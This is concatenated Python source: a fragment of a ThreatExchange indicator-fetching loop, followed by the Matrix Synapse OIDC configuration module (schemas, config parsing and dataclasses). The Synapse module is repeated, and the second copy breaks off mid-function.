collabs: logger.info( "Processing updates for collaboration %s", collab.privacy_group_name ) if not is_int(collab.privacy_group_id): logger.info( f"Fetch skipped because privacy_group_id({collab.privacy_group_id}) is not an int" ) continue indicator_store = ThreatUpdateS3Store( int(collab.privacy_group_id), api.app_id, s3_client=get_s3_client(), s3_bucket_name=config.s3_bucket, s3_te_data_folder=config.s3_te_data_folder, data_store_table=config.data_store_table, supported_signal_types=[VideoMD5Signal, PdqSignal], ) indicator_store.load_checkpoint() if indicator_store.stale: logger.warning( "Store for %s - %d stale! Resetting.", collab.privacy_group_name, int(collab.privacy_group_id), ) indicator_store.reset() if indicator_store.fetch_checkpoint >= now.timestamp(): continue delta = indicator_store.next_delta try: delta.incremental_sync_from_threatexchange( api, ) except: # Don't need to call .exception() here because we're just re-raising logger.error("Exception occurred! Attempting to save...") # Force delta to show finished delta.end = delta.current raise finally: if delta: logging.info("Fetch complete, applying %d updates", len(delta.updates)) indicator_store.apply_updates( delta, post_apply_fn=indicator_store.post_apply ) else: logging.error("Failed before fetching any records")
# Copyright 2020 Quentin Gliech # Copyright 2020-2021 The Matrix.org Foundation C.I.C. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from collections import Counter from typing import Any, Collection, Iterable, List, Mapping, Optional, Tuple, Type import attr from synapse.config._util import validate_config from synapse.config.sso import SsoAttributeRequirement from synapse.python_dependencies import DependencyException, check_requirements from synapse.types import JsonDict from synapse.util.module_loader import load_module from synapse.util.stringutils import parse_and_validate_mxc_uri from ._base import Config, ConfigError, read_file DEFAULT_USER_MAPPING_PROVIDER = "synapse.handlers.oidc.JinjaOidcMappingProvider" # The module that JinjaOidcMappingProvider is in was renamed, we want to # transparently handle both the same. LEGACY_USER_MAPPING_PROVIDER = "synapse.handlers.oidc_handler.JinjaOidcMappingProvider" class OIDCConfig(Config): section = "oidc" def read_config(self, config, **kwargs) -> None: self.oidc_providers = tuple(_parse_oidc_provider_configs(config)) if not self.oidc_providers: return try: check_requirements("oidc") except DependencyException as e: raise ConfigError( e.message # noqa: B306, DependencyException.message is a property ) from e # check we don't have any duplicate idp_ids now. (The SSO handler will also # check for duplicates when the REST listeners get registered, but that happens # after synapse has forked so doesn't give nice errors.) c = Counter([i.idp_id for i in self.oidc_providers]) for idp_id, count in c.items(): if count > 1: raise ConfigError( "Multiple OIDC providers have the idp_id %r." % idp_id ) public_baseurl = self.root.server.public_baseurl self.oidc_callback_url = public_baseurl + "_synapse/client/oidc/callback" @property def oidc_enabled(self) -> bool: # OIDC is enabled if we have a provider return bool(self.oidc_providers) def generate_config_section(self, config_dir_path, server_name, **kwargs) -> str: return """\ # List of OpenID Connect (OIDC) / OAuth 2.0 identity providers, for registration # and login. # # Options for each entry include: # # idp_id: a unique identifier for this identity provider. Used internally # by Synapse; should be a single word such as 'github'. # # Note that, if this is changed, users authenticating via that provider # will no longer be recognised as the same user! # # (Use "oidc" here if you are migrating from an old "oidc_config" # configuration.) # # idp_name: A user-facing name for this identity provider, which is used to # offer the user a choice of login mechanisms. # # idp_icon: An optional icon for this identity provider, which is presented # by clients and Synapse's own IdP picker page. If given, must be an # MXC URI of the format mxc://<server-name>/<media-id>. (An easy way to # obtain such an MXC URI is to upload an image to an (unencrypted) room # and then copy the "url" from the source of the event.) # # idp_brand: An optional brand for this identity provider, allowing clients # to style the login flow according to the identity provider in question. # See the spec for possible options here. # # discover: set to 'false' to disable the use of the OIDC discovery mechanism # to discover endpoints. Defaults to true. # # issuer: Required. The OIDC issuer. Used to validate tokens and (if discovery # is enabled) to discover the provider's endpoints. # # client_id: Required. oauth2 client id to use. # # client_secret: oauth2 client secret to use. May be omitted if # client_secret_jwt_key is given, or if client_auth_method is 'none'. # # client_secret_jwt_key: Alternative to client_secret: details of a key used # to create a JSON Web Token to be used as an OAuth2 client secret. If # given, must be a dictionary with the following properties: # # key: a pem-encoded signing key. Must be a suitable key for the # algorithm specified. Required unless 'key_file' is given. # # key_file: the path to file containing a pem-encoded signing key file. # Required unless 'key' is given. # # jwt_header: a dictionary giving properties to include in the JWT # header. Must include the key 'alg', giving the algorithm used to # sign the JWT, such as "ES256", using the JWA identifiers in # RFC7518. # # jwt_payload: an optional dictionary giving properties to include in # the JWT payload. Normally this should include an 'iss' key. # # client_auth_method: auth method to use when exchanging the token. Valid # values are 'client_secret_basic' (default), 'client_secret_post' and # 'none'. # # scopes: list of scopes to request. This should normally include the "openid" # scope. Defaults to ["openid"]. # # authorization_endpoint: the oauth2 authorization endpoint. Required if # provider discovery is disabled. # # token_endpoint: the oauth2 token endpoint. Required if provider discovery is # disabled. # # userinfo_endpoint: the OIDC userinfo endpoint. Required if discovery is # disabled and the 'openid' scope is not requested. # # jwks_uri: URI where to fetch the JWKS. Required if discovery is disabled and # the 'openid' scope is used. # # skip_verification: set to 'true' to skip metadata verification. Use this if # you are connecting to a provider that is not OpenID Connect compliant. # Defaults to false. Avoid this in production. # # user_profile_method: Whether to fetch the user profile from the userinfo # endpoint. Valid values are: 'auto' or 'userinfo_endpoint'. # # Defaults to 'auto', which fetches the userinfo endpoint if 'openid' is # included in 'scopes'. Set to 'userinfo_endpoint' to always fetch the # userinfo endpoint. # # allow_existing_users: set to 'true' to allow a user logging in via OIDC to # match a pre-existing account instead of failing. This could be used if # switching from password logins to OIDC. Defaults to false. # # user_mapping_provider: Configuration for how attributes returned from a OIDC # provider are mapped onto a matrix user. This setting has the following # sub-properties: # # module: The class name of a custom mapping module. Default is # {mapping_provider!r}. # See https://matrix-org.github.io/synapse/latest/sso_mapping_providers.html#openid-mapping-providers # for information on implementing a custom mapping provider. # # config: Configuration for the mapping provider module. This section will # be passed as a Python dictionary to the user mapping provider # module's `parse_config` method. # # For the default provider, the following settings are available: # # subject_claim: name of the claim containing a unique identifier # for the user. Defaults to 'sub', which OpenID Connect # compliant providers should provide. # # localpart_template: Jinja2 template for the localpart of the MXID. # If this is not set, the user will be prompted to choose their # own username (see 'sso_auth_account_details.html' in the 'sso' # section of this file). # # display_name_template: Jinja2 template for the display name to set # on first login. If unset, no displayname will be set. # # email_template: Jinja2 template for the email address of the user. # If unset, no email address will be added to the account. # # extra_attributes: a map of Jinja2 templates for extra attributes # to send back to the client during login. # Note that these are non-standard and clients will ignore them # without modifications. # # When rendering, the Jinja2 templates are given a 'user' variable, # which is set to the claims returned by the UserInfo Endpoint and/or # in the ID Token. # # It is possible to configure Synapse to only allow logins if certain attributes # match particular values in the OIDC userinfo. The requirements can be listed under # `attribute_requirements` as shown below. All of the listed attributes must # match for the login to be permitted. Additional attributes can be added to # userinfo by expanding the `scopes` section of the OIDC config to retrieve # additional information from the OIDC provider. # # If the OIDC claim is a list, then the attribute must match any value in the list. # Otherwise, it must exactly match the value of the claim. Using the example # below, the `family_name` claim MUST be "Stephensson", but the `groups` # claim MUST contain "admin". # # attribute_requirements: # - attribute: family_name # value: "Stephensson" # - attribute: groups # value: "admin" # # See https://matrix-org.github.io/synapse/latest/openid.html # for information on how to configure these options. # # For backwards compatibility, it is also possible to configure a single OIDC # provider via an 'oidc_config' setting. This is now deprecated and admins are # advised to migrate to the 'oidc_providers' format. (When doing that migration, # use 'oidc' for the idp_id to ensure that existing users continue to be # recognised.) # oidc_providers: # Generic example # #- idp_id: my_idp # idp_name: "My OpenID provider" # idp_icon: "mxc://example.com/mediaid" # discover: false # issuer: "https://accounts.example.com/" # client_id: "provided-by-your-issuer" # client_secret: "provided-by-your-issuer" # client_auth_method: client_secret_post # scopes: ["openid", "profile"] # authorization_endpoint: "https://accounts.example.com/oauth2/auth" # token_endpoint: "https://accounts.example.com/oauth2/token" # userinfo_endpoint: "https://accounts.example.com/userinfo" # jwks_uri: "https://accounts.example.com/.well-known/jwks.json" # skip_verification: true # user_mapping_provider: # config: # subject_claim: "id" # localpart_template: "{{{{ user.login }}}}" # display_name_template: "{{{{ user.name }}}}" # email_template: "{{{{ user.email }}}}" # attribute_requirements: # - attribute: userGroup # value: "synapseUsers" """.format( mapping_provider=DEFAULT_USER_MAPPING_PROVIDER ) # jsonschema definition of the configuration settings for an oidc identity provider OIDC_PROVIDER_CONFIG_SCHEMA = { "type": "object", "required": ["issuer", "client_id"], "properties": { "idp_id": { "type": "string", "minLength": 1, # MSC2858 allows a maxlen of 255, but we prefix with "oidc-" "maxLength": 250, "pattern": "^[A-Za-z0-9._~-]+$", }, "idp_name": {"type": "string"}, "idp_icon": {"type": "string"}, "idp_brand": { "type": "string", "minLength": 1, "maxLength": 255, "pattern": "^[a-z][a-z0-9_.-]*$", }, "discover": {"type": "boolean"}, "issuer": {"type": "string"}, "client_id": {"type": "string"}, "client_secret": {"type": "string"}, "client_secret_jwt_key": { "type": "object", "required": ["jwt_header"], "oneOf": [ {"required": ["key"]}, {"required": ["key_file"]}, ], "properties": { "key": {"type": "string"}, "key_file": {"type": "string"}, "jwt_header": { "type": "object", "required": ["alg"], "properties": { "alg": {"type": "string"}, }, "additionalProperties": {"type": "string"}, }, "jwt_payload": { "type": "object", "additionalProperties": {"type": "string"}, }, }, }, "client_auth_method": { "type": "string", # the following list is the same as the keys of # authlib.oauth2.auth.ClientAuth.DEFAULT_AUTH_METHODS. We inline it # to avoid importing authlib here. "enum": ["client_secret_basic", "client_secret_post", "none"], }, "scopes": {"type": "array", "items": {"type": "string"}}, "authorization_endpoint": {"type": "string"}, "token_endpoint": {"type": "string"}, "userinfo_endpoint": {"type": "string"}, "jwks_uri": {"type": "string"}, "skip_verification": {"type": "boolean"}, "user_profile_method": { "type": "string", "enum": ["auto", "userinfo_endpoint"], }, "allow_existing_users": {"type": "boolean"}, "user_mapping_provider": {"type": ["object", "null"]}, "attribute_requirements": { "type": "array", "items": SsoAttributeRequirement.JSON_SCHEMA, }, }, } # the same as OIDC_PROVIDER_CONFIG_SCHEMA, but with compulsory idp_id and idp_name OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA = { "allOf": [OIDC_PROVIDER_CONFIG_SCHEMA, {"required": ["idp_id", "idp_name"]}] } # the `oidc_providers` list can either be None (as it is in the default config), or # a list of provider configs, each of which requires an explicit ID and name. OIDC_PROVIDER_LIST_SCHEMA = { "oneOf": [ {"type": "null"}, {"type": "array", "items": OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA}, ] } # the `oidc_config` setting can either be None (which it used to be in the default # config), or an object. If an object, it is ignored unless it has an "enabled: True" # property. # # It's *possible* to represent this with jsonschema, but the resultant errors aren't # particularly clear, so we just check for either an object or a null here, and do # additional checks in the code. OIDC_CONFIG_SCHEMA = {"oneOf": [{"type": "null"}, {"type": "object"}]} # the top-level schema can contain an "oidc_config" and/or an "oidc_providers". MAIN_CONFIG_SCHEMA = { "type": "object", "properties": { "oidc_config": OIDC_CONFIG_SCHEMA, "oidc_providers": OIDC_PROVIDER_LIST_SCHEMA, }, } def _parse_oidc_provider_configs(config: JsonDict) -> Iterable["OidcProviderConfig"]: """extract and parse the OIDC provider configs from the config dict The configuration may contain either a single `oidc_config` object with an `enabled: True` property, or a list of provider configurations under `oidc_providers`, *or both*. Returns a generator which yields the OidcProviderConfig objects """ validate_config(MAIN_CONFIG_SCHEMA, config, ()) for i, p in enumerate(config.get("oidc_providers") or []): yield _parse_oidc_config_dict(p, ("oidc_providers", "<item %i>" % (i,))) # for backwards-compatibility, it is also possible to provide a single "oidc_config" # object with an "enabled: True" property. oidc_config = config.get("oidc_config") if oidc_config and oidc_config.get("enabled", False): # MAIN_CONFIG_SCHEMA checks that `oidc_config` is an object, but not that # it matches OIDC_PROVIDER_CONFIG_SCHEMA (see the comments on OIDC_CONFIG_SCHEMA # above), so now we need to validate it. validate_config(OIDC_PROVIDER_CONFIG_SCHEMA, oidc_config, ("oidc_config",)) yield _parse_oidc_config_dict(oidc_config, ("oidc_config",)) def _parse_oidc_config_dict( oidc_config: JsonDict, config_path: Tuple[str, ...] ) -> "OidcProviderConfig": """Take the configuration dict and parse it into an OidcProviderConfig Raises: ConfigError if the configuration is malformed. """ ump_config = oidc_config.get("user_mapping_provider", {}) ump_config.setdefault("module", DEFAULT_USER_MAPPING_PROVIDER) if ump_config.get("module") == LEGACY_USER_MAPPING_PROVIDER: ump_config["module"] = DEFAULT_USER_MAPPING_PROVIDER ump_config.setdefault("config", {}) ( user_mapping_provider_class, user_mapping_provider_config, ) = load_module(ump_config, config_path + ("user_mapping_provider",)) # Ensure loaded user mapping module has defined all necessary methods required_methods = [ "get_remote_user_id", "map_user_attributes", ] missing_methods = [ method for method in required_methods if not hasattr(user_mapping_provider_class, method) ] if missing_methods: raise ConfigError( "Class %s is missing required " "methods: %s" % ( user_mapping_provider_class, ", ".join(missing_methods), ), config_path + ("user_mapping_provider", "module"), ) idp_id = oidc_config.get("idp_id", "oidc") # prefix the given IDP with a prefix specific to the SSO mechanism, to avoid # clashes with other mechs (such as SAML, CAS). # # We allow "oidc" as an exception so that people migrating from old-style # "oidc_config" format (which has long used "oidc" as its idp_id) can migrate to # a new-style "oidc_providers" entry without changing the idp_id for their provider # (and thereby invalidating their user_external_ids data). if idp_id != "oidc": idp_id = "oidc-" + idp_id # MSC2858 also specifies that the idp_icon must be a valid MXC uri idp_icon = oidc_config.get("idp_icon") if idp_icon is not None: try: parse_and_validate_mxc_uri(idp_icon) except ValueError as e: raise ConfigError( "idp_icon must be a valid MXC URI", config_path + ("idp_icon",) ) from e client_secret_jwt_key_config = oidc_config.get("client_secret_jwt_key") client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey] = None if client_secret_jwt_key_config is not None: keyfile = client_secret_jwt_key_config.get("key_file") if keyfile: key = read_file(keyfile, config_path + ("client_secret_jwt_key",)) else: key = client_secret_jwt_key_config["key"] client_secret_jwt_key = OidcProviderClientSecretJwtKey( key=key, jwt_header=client_secret_jwt_key_config["jwt_header"], jwt_payload=client_secret_jwt_key_config.get("jwt_payload", {}), ) # parse attribute_requirements from config (list of dicts) into a list of SsoAttributeRequirement attribute_requirements = [ SsoAttributeRequirement(**x) for x in oidc_config.get("attribute_requirements", []) ] return OidcProviderConfig( idp_id=idp_id, idp_name=oidc_config.get("idp_name", "OIDC"), idp_icon=idp_icon, idp_brand=oidc_config.get("idp_brand"), discover=oidc_config.get("discover", True), issuer=oidc_config["issuer"], client_id=oidc_config["client_id"], client_secret=oidc_config.get("client_secret"), client_secret_jwt_key=client_secret_jwt_key, client_auth_method=oidc_config.get("client_auth_method", "client_secret_basic"), scopes=oidc_config.get("scopes", ["openid"]), authorization_endpoint=oidc_config.get("authorization_endpoint"), token_endpoint=oidc_config.get("token_endpoint"), userinfo_endpoint=oidc_config.get("userinfo_endpoint"), jwks_uri=oidc_config.get("jwks_uri"), skip_verification=oidc_config.get("skip_verification", False), user_profile_method=oidc_config.get("user_profile_method", "auto"), allow_existing_users=oidc_config.get("allow_existing_users", False), user_mapping_provider_class=user_mapping_provider_class, user_mapping_provider_config=user_mapping_provider_config, attribute_requirements=attribute_requirements, ) @attr.s(slots=True, frozen=True, auto_attribs=True) class OidcProviderClientSecretJwtKey: # a pem-encoded signing key key: str # properties to include in the JWT header jwt_header: Mapping[str, str] # properties to include in the JWT payload. jwt_payload: Mapping[str, str] @attr.s(slots=True, frozen=True, auto_attribs=True) class OidcProviderConfig: # a unique identifier for this identity provider. Used in the 'user_external_ids' # table, as well as the query/path parameter used in the login protocol. idp_id: str # user-facing name for this identity provider. idp_name: str # Optional MXC URI for icon for this IdP. idp_icon: Optional[str] # Optional brand identifier for this IdP. idp_brand: Optional[str] # whether the OIDC discovery mechanism is used to discover endpoints discover: bool # the OIDC issuer. Used to validate tokens and (if discovery is enabled) to # discover the provider's endpoints. issuer: str # oauth2 client id to use client_id: str # oauth2 client secret to use. if `None`, use client_secret_jwt_key to generate # a secret. client_secret: Optional[str] # key to use to construct a JWT to use as a client secret. May be `None` if # `client_secret` is set. client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey] # auth method to use when exchanging the token. # Valid values are 'client_secret_basic', 'client_secret_post' and # 'none'. client_auth_method: str # list of scopes to request scopes: Collection[str] # the oauth2 authorization endpoint. Required if discovery is disabled. authorization_endpoint: Optional[str] # the oauth2 token endpoint. Required if discovery is disabled. token_endpoint: Optional[str] # the OIDC userinfo endpoint. Required if discovery is disabled and the # "openid" scope is not requested. userinfo_endpoint: Optional[str] # URI where to fetch the JWKS. Required if discovery is disabled and the # "openid" scope is used. jwks_uri: Optional[str] # Whether to skip metadata verification skip_verification: bool # Whether to fetch the user profile from the userinfo endpoint. Valid # values are: "auto" or "userinfo_endpoint". user_profile_method: str # whether to allow a user logging in via OIDC to match a pre-existing account # instead of failing allow_existing_users: bool # the class of the user mapping provider user_mapping_provider_class: Type # the config of the user mapping provider user_mapping_provider_config: Any # required attributes to require in userinfo to allow login/registration attribute_requirements: List[SsoAttributeRequirement]
# Copyright 2020 Quentin Gliech # Copyright 2020-2021 The Matrix.org Foundation C.I.C. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from collections import Counter from typing import Any, Collection, Iterable, List, Mapping, Optional, Tuple, Type import attr from synapse.config._util import validate_config from synapse.config.sso import SsoAttributeRequirement from synapse.python_dependencies import DependencyException, check_requirements from synapse.types import JsonDict from synapse.util.module_loader import load_module from synapse.util.stringutils import parse_and_validate_mxc_uri from ._base import Config, ConfigError, read_file DEFAULT_USER_MAPPING_PROVIDER = "synapse.handlers.oidc.JinjaOidcMappingProvider" # The module that JinjaOidcMappingProvider is in was renamed, we want to # transparently handle both the same. LEGACY_USER_MAPPING_PROVIDER = "synapse.handlers.oidc_handler.JinjaOidcMappingProvider" class OIDCConfig(Config): section = "oidc" def read_config(self, config, **kwargs) -> None: self.oidc_providers = tuple(_parse_oidc_provider_configs(config)) if not self.oidc_providers: return try: check_requirements("oidc") except DependencyException as e: raise ConfigError( e.message # noqa: B306, DependencyException.message is a property ) from e # check we don't have any duplicate idp_ids now. (The SSO handler will also # check for duplicates when the REST listeners get registered, but that happens # after synapse has forked so doesn't give nice errors.) c = Counter([i.idp_id for i in self.oidc_providers]) for idp_id, count in c.items(): if count > 1: raise ConfigError( "Multiple OIDC providers have the idp_id %r." % idp_id ) public_baseurl = self.root.server.public_baseurl self.oidc_callback_url = public_baseurl + "_synapse/client/oidc/callback" @property def oidc_enabled(self) -> bool: # OIDC is enabled if we have a provider return bool(self.oidc_providers) def generate_config_section(self, config_dir_path, server_name, **kwargs) -> str: return """\ # List of OpenID Connect (OIDC) / OAuth 2.0 identity providers, for registration # and login. # # Options for each entry include: # # idp_id: a unique identifier for this identity provider. Used internally # by Synapse; should be a single word such as 'github'. # # Note that, if this is changed, users authenticating via that provider # will no longer be recognised as the same user! # # (Use "oidc" here if you are migrating from an old "oidc_config" # configuration.) # # idp_name: A user-facing name for this identity provider, which is used to # offer the user a choice of login mechanisms. # # idp_icon: An optional icon for this identity provider, which is presented # by clients and Synapse's own IdP picker page. If given, must be an # MXC URI of the format mxc://<server-name>/<media-id>. (An easy way to # obtain such an MXC URI is to upload an image to an (unencrypted) room # and then copy the "url" from the source of the event.) # # idp_brand: An optional brand for this identity provider, allowing clients # to style the login flow according to the identity provider in question. # See the spec for possible options here. # # discover: set to 'false' to disable the use of the OIDC discovery mechanism # to discover endpoints. Defaults to true. # # issuer: Required. The OIDC issuer. Used to validate tokens and (if discovery # is enabled) to discover the provider's endpoints. # # client_id: Required. oauth2 client id to use. # # client_secret: oauth2 client secret to use. May be omitted if # client_secret_jwt_key is given, or if client_auth_method is 'none'. # # client_secret_jwt_key: Alternative to client_secret: details of a key used # to create a JSON Web Token to be used as an OAuth2 client secret. If # given, must be a dictionary with the following properties: # # key: a pem-encoded signing key. Must be a suitable key for the # algorithm specified. Required unless 'key_file' is given. # # key_file: the path to file containing a pem-encoded signing key file. # Required unless 'key' is given. # # jwt_header: a dictionary giving properties to include in the JWT # header. Must include the key 'alg', giving the algorithm used to # sign the JWT, such as "ES256", using the JWA identifiers in # RFC7518. # # jwt_payload: an optional dictionary giving properties to include in # the JWT payload. Normally this should include an 'iss' key. # # client_auth_method: auth method to use when exchanging the token. Valid # values are 'client_secret_basic' (default), 'client_secret_post' and # 'none'. # # scopes: list of scopes to request. This should normally include the "openid" # scope. Defaults to ["openid"]. # # authorization_endpoint: the oauth2 authorization endpoint. Required if # provider discovery is disabled. # # token_endpoint: the oauth2 token endpoint. Required if provider discovery is # disabled. # # userinfo_endpoint: the OIDC userinfo endpoint. Required if discovery is # disabled and the 'openid' scope is not requested. # # jwks_uri: URI where to fetch the JWKS. Required if discovery is disabled and # the 'openid' scope is used. # # skip_verification: set to 'true' to skip metadata verification. Use this if # you are connecting to a provider that is not OpenID Connect compliant. # Defaults to false. Avoid this in production. # # user_profile_method: Whether to fetch the user profile from the userinfo # endpoint. Valid values are: 'auto' or 'userinfo_endpoint'. # # Defaults to 'auto', which fetches the userinfo endpoint if 'openid' is # included in 'scopes'. Set to 'userinfo_endpoint' to always fetch the # userinfo endpoint. # # allow_existing_users: set to 'true' to allow a user logging in via OIDC to # match a pre-existing account instead of failing. This could be used if # switching from password logins to OIDC. Defaults to false. # # user_mapping_provider: Configuration for how attributes returned from a OIDC # provider are mapped onto a matrix user. This setting has the following # sub-properties: # # module: The class name of a custom mapping module. Default is # {mapping_provider!r}. # See https://matrix-org.github.io/synapse/latest/sso_mapping_providers.html#openid-mapping-providers # for information on implementing a custom mapping provider. # # config: Configuration for the mapping provider module. This section will # be passed as a Python dictionary to the user mapping provider # module's `parse_config` method. # # For the default provider, the following settings are available: # # subject_claim: name of the claim containing a unique identifier # for the user. Defaults to 'sub', which OpenID Connect # compliant providers should provide. # # localpart_template: Jinja2 template for the localpart of the MXID. # If this is not set, the user will be prompted to choose their # own username (see 'sso_auth_account_details.html' in the 'sso' # section of this file). # # display_name_template: Jinja2 template for the display name to set # on first login. If unset, no displayname will be set. # # email_template: Jinja2 template for the email address of the user. # If unset, no email address will be added to the account. # # extra_attributes: a map of Jinja2 templates for extra attributes # to send back to the client during login. # Note that these are non-standard and clients will ignore them # without modifications. # # When rendering, the Jinja2 templates are given a 'user' variable, # which is set to the claims returned by the UserInfo Endpoint and/or # in the ID Token. # # It is possible to configure Synapse to only allow logins if certain attributes # match particular values in the OIDC userinfo. The requirements can be listed under # `attribute_requirements` as shown below. All of the listed attributes must # match for the login to be permitted. Additional attributes can be added to # userinfo by expanding the `scopes` section of the OIDC config to retrieve # additional information from the OIDC provider. # # If the OIDC claim is a list, then the attribute must match any value in the list. # Otherwise, it must exactly match the value of the claim. Using the example # below, the `family_name` claim MUST be "Stephensson", but the `groups` # claim MUST contain "admin". # # attribute_requirements: # - attribute: family_name # value: "Stephensson" # - attribute: groups # value: "admin" # # See https://matrix-org.github.io/synapse/latest/openid.html # for information on how to configure these options. # # For backwards compatibility, it is also possible to configure a single OIDC # provider via an 'oidc_config' setting. This is now deprecated and admins are # advised to migrate to the 'oidc_providers' format. (When doing that migration, # use 'oidc' for the idp_id to ensure that existing users continue to be # recognised.) # oidc_providers: # Generic example # #- idp_id: my_idp # idp_name: "My OpenID provider" # idp_icon: "mxc://example.com/mediaid" # discover: false # issuer: "https://accounts.example.com/" # client_id: "provided-by-your-issuer" # client_secret: "provided-by-your-issuer" # client_auth_method: client_secret_post # scopes: ["openid", "profile"] # authorization_endpoint: "https://accounts.example.com/oauth2/auth" # token_endpoint: "https://accounts.example.com/oauth2/token" # userinfo_endpoint: "https://accounts.example.com/userinfo" # jwks_uri: "https://accounts.example.com/.well-known/jwks.json" # skip_verification: true # user_mapping_provider: # config: # subject_claim: "id" # localpart_template: "{{{{ user.login }}}}" # display_name_template: "{{{{ user.name }}}}" # email_template: "{{{{ user.email }}}}" # attribute_requirements: # - attribute: userGroup # value: "synapseUsers" """.format( mapping_provider=DEFAULT_USER_MAPPING_PROVIDER ) # jsonschema definition of the configuration settings for an oidc identity provider OIDC_PROVIDER_CONFIG_SCHEMA = { "type": "object", "required": ["issuer", "client_id"], "properties": { "idp_id": { "type": "string", "minLength": 1, # MSC2858 allows a maxlen of 255, but we prefix with "oidc-" "maxLength": 250, "pattern": "^[A-Za-z0-9._~-]+$", }, "idp_name": {"type": "string"}, "idp_icon": {"type": "string"}, "idp_brand": { "type": "string", "minLength": 1, "maxLength": 255, "pattern": "^[a-z][a-z0-9_.-]*$", }, "discover": {"type": "boolean"}, "issuer": {"type": "string"}, "client_id": {"type": "string"}, "client_secret": {"type": "string"}, "client_secret_jwt_key": { "type": "object", "required": ["jwt_header"], "oneOf": [ {"required": ["key"]}, {"required": ["key_file"]}, ], "properties": { "key": {"type": "string"}, "key_file": {"type": "string"}, "jwt_header": { "type": "object", "required": ["alg"], "properties": { "alg": {"type": "string"}, }, "additionalProperties": {"type": "string"}, }, "jwt_payload": { "type": "object", "additionalProperties": {"type": "string"}, }, }, }, "client_auth_method": { "type": "string", # the following list is the same as the keys of # authlib.oauth2.auth.ClientAuth.DEFAULT_AUTH_METHODS. We inline it # to avoid importing authlib here. "enum": ["client_secret_basic", "client_secret_post", "none"], }, "scopes": {"type": "array", "items": {"type": "string"}}, "authorization_endpoint": {"type": "string"}, "token_endpoint": {"type": "string"}, "userinfo_endpoint": {"type": "string"}, "jwks_uri": {"type": "string"}, "skip_verification": {"type": "boolean"}, "user_profile_method": { "type": "string", "enum": ["auto", "userinfo_endpoint"], }, "allow_existing_users": {"type": "boolean"}, "user_mapping_provider": {"type": ["object", "null"]}, "attribute_requirements": { "type": "array", "items": SsoAttributeRequirement.JSON_SCHEMA, }, }, } # the same as OIDC_PROVIDER_CONFIG_SCHEMA, but with compulsory idp_id and idp_name OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA = { "allOf": [OIDC_PROVIDER_CONFIG_SCHEMA, {"required": ["idp_id", "idp_name"]}] } # the `oidc_providers` list can either be None (as it is in the default config), or # a list of provider configs, each of which requires an explicit ID and name. OIDC_PROVIDER_LIST_SCHEMA = { "oneOf": [ {"type": "null"}, {"type": "array", "items": OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA}, ] } # the `oidc_config` setting can either be None (which it used to be in the default # config), or an object. If an object, it is ignored unless it has an "enabled: True" # property. # # It's *possible* to represent this with jsonschema, but the resultant errors aren't # particularly clear, so we just check for either an object or a null here, and do # additional checks in the code. OIDC_CONFIG_SCHEMA = {"oneOf": [{"type": "null"}, {"type": "object"}]} # the top-level schema can contain an "oidc_config" and/or an "oidc_providers". MAIN_CONFIG_SCHEMA = { "type": "object", "properties": { "oidc_config": OIDC_CONFIG_SCHEMA, "oidc_providers": OIDC_PROVIDER_LIST_SCHEMA, }, } def _parse_oidc_provider_configs(config: JsonDict) -> Iterable["OidcProviderConfig"]: """extract and parse the OIDC provider configs from the config dict The configuration may contain either a single `oidc_config` object with an `enabled: True` property, or a list of provider configurations under `oidc_providers`, *or both*. Returns a generator which yields the OidcProviderConfig objects """ validate_config(MAIN_CONFIG_SCHEMA, config, ()) for i, p in enumerate(config.get("oidc_providers") or []): yield _parse_oidc_config_dict(p, ("oidc_providers", "<item %i>" % (i,))) # for backwards-compatibility, it is also possible to provide a single "oidc_config" # object with an "enabled: True" property. oidc_config = config.get("oidc_config") if oidc_config and oidc_config.get("enabled", False): # MAIN_CONFIG_SCHEMA checks that `oidc_config` is an object, but not that # it matches OIDC_PROVIDER_CONFIG_SCHEMA (see the comments on OIDC_CONFIG_SCHEMA # above), so now we need to validate it. validate_config(OIDC_PROVIDER_CONFIG_SCHEMA, oidc_config, ("oidc_config",)) yield _parse_oidc_config_dict(oidc_config, ("oidc_config",)) def _parse_oidc_config_dict( oidc_config: JsonDict, config_path: Tuple[str, ...] ) -> "OidcProviderConfig": """Take the configuration dict and parse it into an OidcProviderConfig Raises: ConfigError if the configuration is malformed. """ ump_config = oidc_config.get("user_mapping_provider", {}) ump_config.setdefault("module", DEFAULT_USER_MAPPING_PROVIDER) if ump_config.get("module") == LEGACY_USER_MAPPING_PROVIDER: ump_config["module"] = DEFAULT_USER_MAPPING_PROVIDER ump_config.setdefault("config", {}) ( user_mapping_provider_class, user_mapping_provider_config, ) = load_module(ump_config, config_path + ("user_mapping_provider",)) # Ensure loaded user mapping module has defined all necessary methods required_methods = [ "get_remote_user_id", "map_user_attributes", ] missing_methods = [ method for method in required_methods if not hasattr(user_mapping_provider_class, method) ] if missing_methods: raise ConfigError( "Class %s is missing required " "methods: %s" % ( user_mapping_provider_class, ", ".join(missing_methods), ), config_path + ("user_mapping_provider", "module"), ) idp_id = oidc_config.get("idp_id", "oidc") # prefix the given IDP with a prefix specific to the SSO mechanism, to avoid # clashes with other mechs (such as SAML, CAS). # # We allow "oidc" as an exception so that people migrating from old-style # "oidc_config" format (which has long used "oidc" as its idp_id) can migrate to # a new-style "oidc_providers" entry without changing the idp_id for their provider # (and thereby invalidating their user_external_ids data). if idp_id != "oidc": idp_id = "oidc-" + idp_id # MSC2858 also specifies that the idp_icon must be a valid MXC uri idp_icon = oidc_config.get("idp_icon") if idp_icon is not None: try: parse_and_validate_mxc_uri(idp_icon) except ValueError as e: raise ConfigError( "idp_icon must be a valid MXC URI", config_path + ("idp_icon",) ) from e client_secret_jwt_key_config = 